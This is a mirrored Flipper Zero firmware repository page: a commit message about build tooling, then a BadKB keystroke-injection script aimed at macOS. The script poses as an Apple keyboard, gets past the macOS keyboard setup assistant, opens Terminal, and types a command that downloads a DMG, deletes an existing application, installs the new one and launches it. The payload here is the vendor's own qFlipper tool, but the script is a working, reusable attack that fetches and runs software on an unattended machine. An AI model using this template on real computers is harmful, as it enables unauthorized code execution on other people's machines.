mirror of
https://github.com/DarkFlippers/unleashed-firmware.git
synced 2025-01-03 18:59:43 +03:00
917410a0a8
* fbt: reworking targets & assets handling WIP * fbt: dist fixes * fbt: moved SD card resources to owning apps * unit_tests: moved resources to app folder * github: updated unit_tests paths * github: packaging fixes * unit_tests: fixes * fbt: assets: internal cleanup * fbt: reworked assets handling * github: unit_tests: reintroducing fixes * minor cleanup * fbt: naming changes to reflect private nature of scons tools * fbt: resources: fixed dist archive paths * docs: updated paths * docs: updated more paths * docs: included "resources" parameter in app manifest docs; updated assets readme * updated gitignore for assets * github: updated action versions * unit_tests: restored timeout; scripts: assets: logging changes * gh: don't upload desktop animations for unit test run Co-authored-by: あく <alleteam@gmail.com>
17 lines
848 B
Plaintext
17 lines
848 B
Plaintext
ID 05ac:021e Apple:Keyboard
|
|
REM Keep these 3 lines IF (and only if) it's the first time you are performing a badKB attack against a specific macOS target.
|
|
REM In fact, it helps Flipper Zero bypass the macOS keyboard setup assistant. Otherwise the attack will not start.
|
|
REM Author: 47LeCoste
|
|
REM Version 1.0 (Flipper Ducky)
|
|
REM Target: macOS
|
|
DELAY 3000
|
|
F4
|
|
DELAY 2500
|
|
STRING Terminal
|
|
DELAY 2500
|
|
ENTER
|
|
DELAY 1500
|
|
STRING (cd /tmp && curl -L -o qFlipper.dmg https://update.flipperzero.one/qFlipper/release/macos-amd64/dmg && hdiutil attach qFlipper.dmg && app_volume=$(ls /Volumes | grep -i "qFlipper") && (test -e /Applications/qFlipper.app && rm -rf /Applications/qFlipper.app ); cp -R "/Volumes/$app_volume/qFlipper.app" /Applications/ && hdiutil detach "/Volumes/$app_volume" && rm qFlipper.dmg && open /Applications/qFlipper.app)
|
|
DELAY 1000
|
|
ENTER
|